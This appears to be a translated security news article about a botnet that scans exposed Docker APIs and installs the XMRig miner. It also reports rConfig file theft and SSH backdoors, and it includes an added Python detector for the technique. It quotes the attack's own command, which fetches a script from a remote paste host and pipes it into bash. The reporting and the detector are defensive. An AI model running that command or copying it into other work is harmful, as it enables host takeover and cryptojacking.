Tuesday, November 24, 13:40

Hackers install cryptominer on Docker platforms with exposed API endpoints

Researchers have found that a hacking group is mass-scanning the Internet for Docker platforms whose API endpoints are exposed online.

The hackers run these scans in order to deploy a cryptominer on the exposed Docker platforms and make money from it.

Professionals behind the hacking campaign

According to researchers, the mass scanning campaign started on the weekend of November 24. It immediately caught the researchers' attention because of its scale.

Troy Mursch, chief research officer and co-founder of Bad Packets LLC, said that exploiting exposed Docker platforms is nothing new; it happens often.

"What caught our attention was the wide scan range. This in itself required further research to find out what this botnet was targeting," he said.

What information do we have so far?

So far, researchers have discovered that the hacking group responsible for this campaign has already scanned more than 59,000 IP networks (netblocks) looking for exposed Docker platforms.

When a vulnerable machine is found, the hackers use the API endpoint to start an Alpine Linux container, inside which they execute the following command:

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'

This command downloads a Bash script from the attackers' server and executes it. The script then installs the XMRig cryptominer. According to Mursch, over the weekend the hackers mined 14.82 Monero (XMR) coins, worth just 740 dollars.
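The command above gives defenders something concrete to look for: a container that bind-mounts the host's root filesystem and runs chroot into it, and a command line that pipes a downloaded script straight into a shell. The following check, added here as an example and not part of the original article, runs those two tests over docker inspect output; the sample JSON and the example.invalid URL are constructed for the demonstration.

```python
import json
import shlex

# Constructed sample of `docker inspect` output, trimmed to the fields used below.
# The first container mirrors the technique described in the article; the second is benign.
SAMPLE_INSPECT = json.dumps([
    {"Id": "a1b2c3",
     "Config": {"Image": "alpine",
                "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                        "curl -sL4 http://example.invalid/x | bash"]},
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}},
    {"Id": "d4e5f6",
     "Config": {"Image": "nginx:1.19", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False}},
])

DOWNLOAD_TOOLS = {"curl", "wget"}
SHELLS = {"sh", "bash", "/bin/sh", "/bin/bash"}


def host_root_mounts(container):
    """Return the in-container paths where the host's '/' is bind-mounted."""
    binds = container.get("HostConfig", {}).get("Binds") or []
    return [b.split(":")[1] for b in binds if len(b.split(":")) >= 2 and b.split(":")[0] == "/"]


def pipes_download_to_shell(cmd):
    """True if the command runs curl/wget and pipes the output into a shell."""
    tokens = []
    for arg in cmd:
        try:
            tokens.extend(shlex.split(arg))  # expand 'sh -c "..."' payload strings
        except ValueError:
            tokens.append(arg)
    for i, tok in enumerate(tokens):
        if tok == "|" and i + 1 < len(tokens) and tokens[i + 1] in SHELLS:
            if any(t in DOWNLOAD_TOOLS for t in tokens[:i]):
                return True
    return False


def findings(inspect_json):
    """Return (container id, reasons) for every container matching the pattern."""
    out = []
    for c in json.loads(inspect_json):
        cmd = c.get("Config", {}).get("Cmd") or []
        reasons = []
        chroot_targets = [m for m in host_root_mounts(c) if "chroot" in cmd and m in cmd]
        if chroot_targets:
            reasons.append("chroot into host root bind mount %s" % chroot_targets[0])
        if pipes_download_to_shell(cmd):
            reasons.append("downloads a script and pipes it to a shell")
        if reasons:
            out.append((c["Id"], reasons))
    return out
```

On a live host, feed it the output of `docker inspect $(docker ps -aq)` instead of the constructed sample.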

The researchers also noticed that the malware the hackers install has a self-defense measure.

"One unique but interesting function of this campaign is that it uninstalls known monitoring programs and kills various processes, through a script downloaded from http://ix[.]io/1XQh," Mursch said.

This script disables security products and kills processes belonging to rival cryptomining botnets, such as DDG.

In addition, Mursch discovered that the malicious script has another function: it scans the infected host for rConfig configuration files. The script encrypts and steals those files and sends them to the attackers' command-and-control server.

Craig H. Rowland, founder of Sandfly Security, also noted that the hackers create backdoor accounts in the compromised containers and leave behind SSH keys, so that they can regain access easily and remotely control all infected bots.

For now, Mursch urges all users and companies running Docker platforms to check whether they have API endpoints exposed to the Internet and, if so, to act immediately.


Absent Mia